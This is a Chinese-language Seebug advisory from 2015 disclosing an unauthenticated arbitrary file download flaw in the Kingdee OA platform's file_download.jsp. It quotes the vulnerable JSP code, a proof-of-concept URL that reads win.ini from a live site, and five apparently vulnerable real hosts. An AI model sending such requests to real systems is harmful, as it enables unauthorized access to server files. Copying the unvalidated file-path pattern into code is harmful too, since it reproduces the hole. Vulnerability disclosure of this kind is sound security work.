金蝶协同办公平台任意文件下载漏洞(无需登录)

2015-08-04T00:00:00
ID SSV:93827
Type seebug
Reporter Root
Modified 2015-08-04T00:00:00

Description

简要描述:

金蝶协同办公平台任意文件下载漏洞(无需登录)

详细说明:

经测试发现,该系统存在任意文件下载,且无需登录 存在漏洞的文件:

/oa/admin/application/file_download.jsp?filePath=

部分漏洞代码为:

<%@ page import="java.util.Calendar,org.springside.core.Constants,cn.firstsoft.firstframe.admin.Environment"%><% String logPath = request.getParameter("filePath")==null?"D:\\KingdeeOA\\Tomcat_5.5\\logs\\catalina.2007-12-29.log ":request.getParameter("filePath"); String contentType = request.getParameter("contentType")==null?"application/x-download":request.getParameter("contentType"); String fileName = request.getParameter("fileName")==null?"file.txt":request.getParameter("fileName"); java.io.OutputStream ou = null; java.io.InputStream is = null; try{ java.io.File logFile = new java.io.File(logPath); if (logFile.exists()) { is = new java.io.FileInputStream(logPath); byte[] content = new byte[1024]; int i = 0; response.setContentType(contentType); ou = response.getOutputStream(); response.setHeader("Content-Disposition", "attachment; filename=\""+fileName+"\""); while ((i = is.read(content)) != -1) { ou.write(content, 0, i); } ou.flush(); } else { out.println("file not found:"+logPath); } } catch (Exception e) { System.out.println(e); } finally { if (ou != null) ou.close(); if (is != null) is.close(); } %>

很明显的任意文件下载漏洞,随便在网上找一个实例进行证明

http://oa.xpngs.com/oa/admin/application/file_download.jsp?filePath=c:\windows\win.ini

直接访问即可下载该文件了,保存的文件名为:file.txt

<img src="https://images.seebug.org/upload/201508/03215140d50cc7e1216f834cd627296221c9e8ad.png" alt="1.png" width="600" onerror="javascript:errimg(this);">

5个案例:

http://oa.xpngs.com/oa/themes/mskin/login/login.jsp http://newoa.qingyitang.com:7890/oa/themes/mskin/login/login.jsp http://wt.zhengtongauto.com/oa/themes/mskin/login/login.jsp http://113.106.196.36:7890/oa/themes/mskin/login/login.jsp?login_error=quit http://www.jrxoa.com/oa/themes/mskin/login/login.jsp

漏洞证明:

下载的文件

<img src="https://images.seebug.org/upload/201508/03215140d50cc7e1216f834cd627296221c9e8ad.png" alt="1.png" width="600" onerror="javascript:errimg(this);">